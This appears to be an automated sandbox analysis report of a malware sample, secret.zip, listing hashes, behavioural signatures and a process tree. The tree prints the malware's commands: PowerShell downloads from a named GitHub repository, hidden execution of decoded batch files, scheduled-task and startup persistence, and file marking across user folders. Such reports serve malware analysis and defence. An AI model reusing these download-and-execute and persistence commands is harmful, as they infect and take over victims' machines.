Analysis

- max time kernel: 324s
- max time network: 330s
- platform: windows11-21h2_x64
- resource: win11-20250502-en
- resource tags: arch:x64, arch:x86, image:win11-20250502-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 15/05/2025, 08:29
- Static task: static1
- Behavioral task: behavioral1
  - Sample: secret.zip
  - Resource: win11-20250502-en
General

- Target: secret.zip
- Size: 6.7MB
- MD5: 0304a313d8765b24f3a5106af2687dd1
- SHA1: d6183b9f2d11a3a64829b035c8718ac07f77b98a
- SHA256: f41e468b671f59a1cdaf868e4dc91106e341bdce5cad41d01c151d0e7ebcd9d1
- SHA512: 2619b81d8a19ec7bdd7feefdec119bd1c0d39c90fcb067b22c88f4b6f9a10af395e9718f075d080e9410cdf70e04a58124b99ca359639f9a1a34404ccc55535f
- SSDEEP: 196608:Mwp3XbOfBcS1masjD+u3ztYv6NhEEk5ab+rTzqnoM:MoIxmasndhpN6Gb6TdM
Malware Config
Signatures

Blocklisted process makes network request (7 IoCs)

| flow | pid | Process |
|---|---|---|
| 17 | 3260 | powershell.exe |
| 18 | 3260 | powershell.exe |
| 21 | 5696 | powershell.exe |
| 22 | 5696 | powershell.exe |
| 23 | 4844 | powershell.exe |
| 24 | 4844 | powershell.exe |
| 25 | 5592 | powershell.exe |

Command and Scripting Interpreter: PowerShell (11 IoCs)

| pid | Process |
|---|---|
| 4396 | powershell.exe |
| 3628 | powershell.exe |
| 3432 | powershell.exe |
| 5492 | powershell.exe |
| 328 | powershell.exe |
| 5648 | powershell.exe |
| 3868 | powershell.exe |
| 5592 | powershell.exe |
| 3260 | powershell.exe |
| 5696 | powershell.exe |
| 4844 | powershell.exe |

Drops startup file (1 IoCs)

| description | ioc | Process |
|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\regstartup32.bat | cmd.exe |

Executes dropped EXE (3 IoCs)

| pid | Process |
|---|---|
| 2908 | svchost.exe |
| 2824 | svchost.exe |
| 3104 | Rar.exe |

Deobfuscate/Decode Files or Information (1 IoCs)

| pid | Process |
|---|---|
| 5580 | certutil.exe |

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 9 IoCs)

| flow | ioc |
|---|---|
| 2 | discord.com |
| 4 | discord.com |
| 11 | discord.com |
| 18 | raw.githubusercontent.com |
| 24 | raw.githubusercontent.com |
| 3 | discord.com |
| 12 | discord.com |
| 14 | raw.githubusercontent.com |
| 22 | raw.githubusercontent.com |
Drops file in System32 directory (1 IoCs)

| description | ioc | Process |
|---|---|---|
| File created | C:\Windows\system32\balls.bat | powershell.exe |

Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)

| description | ioc | Process |
|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-330179853-1108322181-418488014-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ANCVirus.png" | reg.exe |

Drops file in Windows directory (2 IoCs)

| description | ioc | Process |
|---|---|---|
| File opened for modification | C:\Windows\SystemTemp | msedge.exe |
| File opened for modification | C:\Windows\SystemTemp | msedge.exe |

Enumerates physical storage devices (1 TTPs)

Attempts to interact with connected storage/optical drive(s).

System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 5 IoCs)

Adversaries may check for Internet connectivity on compromised systems.

| pid | Process |
|---|---|
| 3704 | findstr.exe |
| 4548 | findstr.exe |
| 1828 | findstr.exe |
| 1760 | cmd.exe |
| 5224 | cmd.exe |

Enumerates system info in registry (2 TTPs, 6 IoCs)

| description | ioc | Process |
|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe |

Modifies data under HKEY_USERS (3 IoCs)

| description | ioc | Process |
|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | msedge.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133917717166453887" | msedge.exe |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | msedge.exe |

Modifies registry class (5 IoCs)

| description | ioc | Process |
|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-330179853-1108322181-418488014-1000_Classes\Local Settings\MuiCache | MiniSearchHost.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-330179853-1108322181-418488014-1000\{48A23430-6D71-4A0F-9358-81C0CFDFB29D} | msedge.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-330179853-1108322181-418488014-1000\{977BB5F3-E485-4AB6-927C-1A2E4E3A0765} | msedge.exe |
Scheduled Task/Job: Scheduled Task (1 TTPs, 1 IoCs)

Schtasks is often used by malware for persistence or to perform post-infection execution.

| pid | Process |
|---|---|
| 4492 | schtasks.exe |

Suspicious behavior: EnumeratesProcesses (31 IoCs)

| pid | Process |
|---|---|
| 3260 | powershell.exe |
| 3260 | powershell.exe |
| 3628 | powershell.exe |
| 3628 | powershell.exe |
| 3432 | powershell.exe |
| 3432 | powershell.exe |
| 3432 | powershell.exe |
| 5696 | powershell.exe |
| 5696 | powershell.exe |
| 5696 | powershell.exe |
| 4844 | powershell.exe |
| 4844 | powershell.exe |
| 4844 | powershell.exe |
| 5492 | powershell.exe |
| 5492 | powershell.exe |
| 5492 | powershell.exe |
| 328 | powershell.exe |
| 328 | powershell.exe |
| 328 | powershell.exe |
| 5648 | powershell.exe |
| 5648 | powershell.exe |
| 5648 | powershell.exe |
| 3868 | powershell.exe |
| 3868 | powershell.exe |
| 3868 | powershell.exe |
| 5592 | powershell.exe |
| 5592 | powershell.exe |
| 5592 | powershell.exe |
| 4396 | powershell.exe |
| 4396 | powershell.exe |
| 4396 | powershell.exe |

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (6 IoCs)

| pid | Process |
|---|---|
| 2436 | msedge.exe |
| 2436 | msedge.exe |
| 2436 | msedge.exe |
| 2436 | msedge.exe |
| 3124 | msedge.exe |
| 3124 | msedge.exe |

Suspicious use of AdjustPrivilegeToken (11 IoCs)

| description | pid | Process |
|---|---|---|
| Token: SeDebugPrivilege | 3260 | powershell.exe |
| Token: SeDebugPrivilege | 3628 | powershell.exe |
| Token: SeDebugPrivilege | 3432 | powershell.exe |
| Token: SeDebugPrivilege | 5696 | powershell.exe |
| Token: SeDebugPrivilege | 4844 | powershell.exe |
| Token: SeDebugPrivilege | 5492 | powershell.exe |
| Token: SeDebugPrivilege | 328 | powershell.exe |
| Token: SeDebugPrivilege | 5648 | powershell.exe |
| Token: SeDebugPrivilege | 3868 | powershell.exe |
| Token: SeDebugPrivilege | 5592 | powershell.exe |
| Token: SeDebugPrivilege | 4396 | powershell.exe |

Suspicious use of FindShellTrayWindow (2 IoCs)

| pid | Process |
|---|---|
| 2436 | msedge.exe |
| 2436 | msedge.exe |

Suspicious use of SetWindowsHookEx (1 IoCs)

| pid | Process |
|---|---|
| 2720 | MiniSearchHost.exe |
Suspicious use of WriteProcessMemory (64 IoCs)

| description | pid | Process | procid_target |
|---|---|---|---|
| PID 2564 wrote to memory of 4492 | 2564 | rembotperm.exe | 4492 |
| PID 2564 wrote to memory of 4492 | 2564 | rembotperm.exe | 4492 |
| PID 2564 wrote to memory of 2824 | 2564 | rembotperm.exe | 2824 |
| PID 2564 wrote to memory of 2824 | 2564 | rembotperm.exe | 2824 |
| PID 2564 wrote to memory of 2908 | 2564 | rembotperm.exe | 2908 |
| PID 2564 wrote to memory of 2908 | 2564 | rembotperm.exe | 2908 |
| PID 2908 wrote to memory of 1952 | 2908 | svchost.exe | 1952 |
| PID 2908 wrote to memory of 1952 | 2908 | svchost.exe | 1952 |
| PID 2824 wrote to memory of 5940 | 2824 | svchost.exe | 5940 |
| PID 2824 wrote to memory of 5940 | 2824 | svchost.exe | 5940 |
| PID 5940 wrote to memory of 3260 | 5940 | cmd.exe | 3260 |
| PID 5940 wrote to memory of 3260 | 5940 | cmd.exe | 3260 |
| PID 2908 wrote to memory of 1172 | 2908 | svchost.exe | 1172 |
| PID 2908 wrote to memory of 1172 | 2908 | svchost.exe | 1172 |
| PID 1172 wrote to memory of 3628 | 1172 | cmd.exe | 3628 |
| PID 1172 wrote to memory of 3628 | 1172 | cmd.exe | 3628 |
| PID 3628 wrote to memory of 5796 | 3628 | powershell.exe | 5796 |
| PID 3628 wrote to memory of 5796 | 3628 | powershell.exe | 5796 |
| PID 1172 wrote to memory of 852 | 1172 | cmd.exe | 852 |
| PID 1172 wrote to memory of 852 | 1172 | cmd.exe | 852 |
| PID 1172 wrote to memory of 2536 | 1172 | cmd.exe | 2536 |
| PID 1172 wrote to memory of 2536 | 1172 | cmd.exe | 2536 |
| PID 1172 wrote to memory of 2392 | 1172 | cmd.exe | 2392 |
| PID 1172 wrote to memory of 2392 | 1172 | cmd.exe | 2392 |
| PID 1172 wrote to memory of 2812 | 1172 | cmd.exe | 2812 |
| PID 1172 wrote to memory of 2812 | 1172 | cmd.exe | 2812 |
| PID 1172 wrote to memory of 1556 | 1172 | cmd.exe | 1556 |
| PID 1172 wrote to memory of 1556 | 1172 | cmd.exe | 1556 |
| PID 1172 wrote to memory of 3864 | 1172 | cmd.exe | 3864 |
| PID 1172 wrote to memory of 3864 | 1172 | cmd.exe | 3864 |
| PID 1172 wrote to memory of 1092 | 1172 | cmd.exe | 1092 |
| PID 1172 wrote to memory of 1092 | 1172 | cmd.exe | 1092 |
| PID 1172 wrote to memory of 2792 | 1172 | cmd.exe | 2792 |
| PID 1172 wrote to memory of 2792 | 1172 | cmd.exe | 2792 |
| PID 1172 wrote to memory of 4776 | 1172 | cmd.exe | 4776 |
| PID 1172 wrote to memory of 4776 | 1172 | cmd.exe | 4776 |
| PID 1172 wrote to memory of 2628 | 1172 | cmd.exe | 2628 |
| PID 1172 wrote to memory of 2628 | 1172 | cmd.exe | 2628 |
| PID 1172 wrote to memory of 3564 | 1172 | cmd.exe | 3564 |
| PID 1172 wrote to memory of 3564 | 1172 | cmd.exe | 3564 |
| PID 1172 wrote to memory of 2760 | 1172 | cmd.exe | 2760 |
| PID 1172 wrote to memory of 2760 | 1172 | cmd.exe | 2760 |
| PID 1172 wrote to memory of 2328 | 1172 | cmd.exe | 2328 |
| PID 1172 wrote to memory of 2328 | 1172 | cmd.exe | 2328 |
| PID 1172 wrote to memory of 1492 | 1172 | cmd.exe | 1492 |
| PID 1172 wrote to memory of 1492 | 1172 | cmd.exe | 1492 |
| PID 1172 wrote to memory of 720 | 1172 | cmd.exe | 720 |
| PID 1172 wrote to memory of 720 | 1172 | cmd.exe | 720 |
| PID 1172 wrote to memory of 1012 | 1172 | cmd.exe | 1012 |
| PID 1172 wrote to memory of 1012 | 1172 | cmd.exe | 1012 |
| PID 1172 wrote to memory of 2856 | 1172 | cmd.exe | 2856 |
| PID 1172 wrote to memory of 2856 | 1172 | cmd.exe | 2856 |
| PID 1172 wrote to memory of 2484 | 1172 | cmd.exe | 2484 |
| PID 1172 wrote to memory of 2484 | 1172 | cmd.exe | 2484 |
| PID 1172 wrote to memory of 2052 | 1172 | cmd.exe | 2052 |
| PID 1172 wrote to memory of 2052 | 1172 | cmd.exe | 2052 |
| PID 1172 wrote to memory of 1400 | 1172 | cmd.exe | 1400 |
| PID 1172 wrote to memory of 1400 | 1172 | cmd.exe | 1400 |
| PID 1172 wrote to memory of 644 | 1172 | cmd.exe | 644 |
| PID 1172 wrote to memory of 644 | 1172 | cmd.exe | 644 |
| PID 5796 wrote to memory of 4568 | 5796 | cmd.exe | 4568 |
| PID 5796 wrote to memory of 4568 | 5796 | cmd.exe | 4568 |
| PID 5796 wrote to memory of 3432 | 5796 | cmd.exe | 3432 |
| PID 5796 wrote to memory of 3432 | 5796 | cmd.exe | 3432 |

Uses Task Scheduler COM API (1 TTPs)

The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Views/modifies file attributes (1 TTPs, 2 IoCs)

| pid | Process |
|---|---|
| 4568 | attrib.exe |
| 4604 | attrib.exe |
Processes

Each entry gives the process tree level, the PID, the image path in parentheses and the command line after the colon; the signatures triggered by that process are listed beneath it.

- [level 1] PID 3920 (C:\Windows\Explorer.exe): C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\secret.zip
- [level 1] PID 2720 (C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe): "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
- [level 1] PID 4816 (C:\Windows\System32\rundll32.exe): C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
- [level 1] PID 2564 (C:\Users\Admin\AppData\Local\Temp\Temp1_secret.zip\rembotperm.exe): "C:\Users\Admin\AppData\Local\Temp\Temp1_secret.zip\rembotperm.exe"
  - Suspicious use of WriteProcessMemory
- [level 2] PID 4492 (C:\Windows\system32\schtasks.exe): schtasks /Create /SC ONLOGON /RL HIGHEST /TN EmbeddedAppTask /TR C:\Users\Admin\AppData\Local\Temp\svchost.exe /F
  - Scheduled Task/Job: Scheduled Task
- [level 2] PID 2824 (C:\Users\Admin\AppData\Local\Temp\svchost.exe): "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
- [level 3] PID 5940 (C:\Windows\system32\cmd.exe): cmd /C "powershell Invoke-WebRequest -Uri \"https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/balls.bat\" -OutFile \"balls.bat\""
  - Suspicious use of WriteProcessMemory
- [level 4] PID 3260 (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe): powershell Invoke-WebRequest -Uri \"https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/balls.bat\" -OutFile \"balls.bat\"
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [level 2] PID 2908 (C:\Users\Admin\AppData\Local\Temp\svchost.exe): C:\Users\Admin\AppData\Local\Temp\svchost.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
- [level 3] PID 1952 (C:\Windows\system32\cmd.exe): cmd /C "Invoke-WebRequest -Uri \"https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/balls.bat \" -OutFile \"balls.bat\""
- [level 3] PID 1172 (C:\Windows\system32\cmd.exe): cmd /C balls.bat
  - Suspicious use of WriteProcessMemory
- [level 4] PID 3628 (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe): powershell -Command "$Base64 = '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'; $TempFile = [System.IO.Path]::Combine($env:TEMP, (Get-Random).ToString() + '.bat'); [System.IO.File]::WriteAllBytes($TempFile, [System.Convert]::FromBase64String($Base64)); Start-Process -WindowStyle Hidden -FilePath $TempFile"
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- [level 5] PID 5796 (C:\Windows\system32\cmd.exe): C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1945869879.bat" "
  - Suspicious use of WriteProcessMemory
- [level 6] PID 4568 (C:\Windows\system32\attrib.exe): attrib +h "C:\Users\Admin\Microsoft-Edge"
  - Views/modifies file attributes
- [level 6] PID 3432 (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe): powershell -Command "Start-Process '"C:\Users\Admin\Microsoft-Edge\updater.bat"' -WindowStyle Hidden"
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [level 7] PID 5088 (C:\Windows\system32\cmd.exe): C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Microsoft-Edge\updater.bat" "
- [level 8] PID 5696 (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe): powershell -Command "& {Invoke-WebRequest -Uri 'https://github.com/VisoXC/MisterBombastic/raw/main/don/Rar.exe' -OutFile '"C:\Users\Admin\Microsoft-Edge\Rar.exe"'}"
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [level 8] PID 4844 (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe): powershell -Command "Invoke-WebRequest -Uri 'https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/ANCVirus.rar' -OutFile '"C:\Users\Admin\Microsoft-Edge\tmp.rar"'"
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [level 8] PID 3104 (C:\Users\Admin\Microsoft-Edge\Rar.exe): "C:\Users\Admin\Microsoft-Edge\Rar" x -pANConTOP "C:\Users\Admin\Microsoft-Edge\tmp.rar" "C:\Users\Admin\Microsoft-Edge"
  - Executes dropped EXE
- [level 8] PID 5580 (C:\Windows\system32\certutil.exe): certutil -decode "C:\Users\Admin\AppData\Local\Temp\15623_3106930297.tmp" "C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd"
  - Deobfuscate/Decode Files or Information
- [level 8] PID 5492 (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe): powershell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd"' -WindowStyle Hidden"
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [level 9] PID 2524 (C:\Windows\system32\cmd.exe): C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd" "
- [level 10] PID 328 (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe): powershell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd"' -WindowStyle Hidden"
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [level 11] PID 1340 (C:\Windows\system32\cmd.exe): C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd" "
  - Drops startup file
- [level 12] PID 4604 (C:\Windows\system32\attrib.exe): attrib +h "C:\Users\Admin\ANC"
  - Views/modifies file attributes
- [level 12] PID 5648 (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe): powershell -command "Start-Process '"C:\Users\Admin\ANC\payload.bat"' -WindowStyle Hidden"
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [level 13] PID 1380 (C:\Windows\system32\cmd.exe): C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\ANC\payload.bat" "
- [level 14] PID 3868 (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe): powershell -Command "Start-Process '"C:\Users\Admin\ANC\payload.bat"' -WindowStyle Hidden"
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [level 15] PID 3468 (C:\Windows\system32\cmd.exe): C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\ANC\payload.bat" "
- [level 16] PID 5592 (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe): powershell -Command "Invoke-WebRequest -Uri 'https://i.imgur.com/4A1D39J.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\ANCVirus.png' -ErrorAction SilentlyContinue"
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [level 16] PID 4492 (C:\Windows\system32\reg.exe): reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ANCVirus.png" /f
  - Sets desktop wallpaper using registry
- [level 16] PID 3340 (C:\Windows\system32\reg.exe): reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "10" /f
- [level 16] PID 3280 (C:\Windows\system32\reg.exe): reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
- [level 16] PID 1244 (C:\Windows\system32\rundll32.exe): RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters 1, True
- [level 16] PID 3096 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\AssertSplit.jpeg"
- [level 16] PID 3492 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\BlockExport.mp4"
- [level 16] PID 5016 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ClearLimit.eprtx"
- [level 16] PID 3704 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ConvertFromPing.potm"
  - System Network Configuration Discovery: Internet Connection Discovery
- [level 16] PID 4948 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\CopyEnter.sql"
- [level 16] PID 2548 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ImportExit.temp"
- [level 16] PID 1632 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\InitializeTest.crw"
- [level 16] PID 4416 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\Microsoft Edge.lnk"
- [level 16] PID 4548 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\PingShow.mpe"
  - System Network Configuration Discovery: Internet Connection Discovery
- [level 16] PID 5004 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ProtectLimit.jfif"
- [level 16] PID 3388 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\PublishGroup.xlsb"
- [level 16] PID 2056 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ReceiveWatch.clr"
- [level 16] PID 2880 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\RepairWrite.midi"
- [level 16] PID 3584 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ResetInstall.dotx"
- [level 16] PID 3136 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ResizeClose.rm"
- [level 16] PID 6076 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ResizeUnlock.xps"
- [level 16] PID 5372 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\RestorePush.au3"
- [level 16] PID 4588 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SaveInitialize.au3"
- [level 16] PID 5724 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SendUnlock.docx"
- [level 16] PID 4208 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SkipFind.vdw"
- [level 16] PID 5364 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SplitImport.docx"
- [level 16] PID 5824 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\StepGrant.eps"
- [level 16] PID 4596 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SubmitStep.MOD"
- [level 16] PID 4040 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\TestBlock.zip"
- [level 16] PID 4648 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UnlockUninstall.wmx"
- [level 16] PID 1700 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UnpublishDismount.txt"
- [level 16] PID 3192 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UnregisterConfirm.vdw"
- [level 16] PID 692 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UnregisterStop.jtx"
- [level 16] PID 880 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UpdateReceive.ttc"
- [level 16] PID 4872 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UpdateRegister.ttf"
- [level 16] PID 5764 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\WatchDismount.emf"
- [level 16] PID 5104 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\AssertRequest.vsd"
- [level 16] PID 1380 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\BlockSearch.pub"
- [level 16] PID 5932 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\CompressSkip.xlsx"
- [level 16] PID 5796 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ConvertUndo.xltm"
- [level 16] PID 4740 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\DenyBlock.pot"
- [level 16] PID 3152 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\DenyDisable.vsdm"
- [level 16] PID 3280 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\DenyJoin.pptm"
- [level 16] PID 536 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\DisableResize.xlsb"
- [level 16] PID 3384 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ExportReceive.pub"
- [level 16] PID 1532 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\FindProtect.dot"
- [level 16] PID 3320 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\GrantImport.xlsm"
- [level 16] PID 664 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\HideReceive.htm"
- [level 16] PID 5748 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MeasureDebug.pptx"
- [level 16] PID 1828 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MeasurePing.ods"
  - System Network Configuration Discovery: Internet Connection Discovery
- [level 16] PID 4996 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MergePush.vdx"
- [level 16] PID 6040 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MountMerge.pptm"
- [level 16] PID 5988 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MountPop.odp"
- [level 16] PID 5992 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\OutTest.dot"
- [level 16] PID 5076 (C:\Windows\system32\findstr.exe): findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\RedoApprove.pot"
